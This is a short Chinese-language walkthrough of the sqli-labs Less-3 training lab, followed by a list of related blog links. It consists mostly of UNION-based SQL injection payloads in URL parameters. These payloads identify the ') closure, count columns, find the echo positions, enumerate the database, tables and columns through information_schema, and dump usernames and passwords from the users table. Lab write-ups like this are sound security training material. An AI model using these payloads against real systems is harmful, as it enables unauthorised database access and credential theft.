SQL注入实例(sqli-labs/less-3)

0、初始页面

1、确定闭合字符

确定为字符型注入

?id=1 and 1=1 
?id=1 and 1=2

确定闭合字符为 ')

?id=1'
?id=1')

2、确定表的列数

确定查询表的列数为3

?id=1') order by 3 --+

3、确定回显位置

确定回显位置为第二列和第三列

?id=-1') union select 1,2,3 --+

4、爆库名

当前所在数据库为security

?id=-1') union select 1,user(),database() --+

5、爆表名

查看users表

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

6、爆列名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' --+

7、显示最终结果

?id=-1%27) union select 1,2,group_concat(username,0x3a,password) from security.users --+
相关推荐
Hello.Reader1 小时前
Redis大Key问题全解析
数据库·redis·bootstrap
靖顺3 小时前
【OceanBase 诊断调优】—— packet fly cost too much time 的根因分析
数据库·oceanbase
liuxin334455663 小时前
学籍管理系统:实现教育管理现代化
java·开发语言·前端·数据库·安全
天冬忘忧4 小时前
Flink优化----FlinkSQL 调优
大数据·sql·flink
yuanbenshidiaos5 小时前
C++--------------树
java·数据库·c++
dengjiayue7 小时前
MySQL 查询大偏移量(LIMIT)问题分析
数据库·mysql
言之。7 小时前
【MySQL】在MySQL中如何定位慢查询?
数据库·mysql
DashVector7 小时前
如何通过HTTP API插入Doc
数据库·人工智能·http·阿里云·向量检索
DashVector7 小时前
如何通过HTTP API分组检索Doc
服务器·数据库·http·数据库开发·数据库架构
Suwg2097 小时前
【MySQL】踩坑笔记——保存带有换行符等特殊字符的数据,需要进行转义保存
数据库·笔记·mysql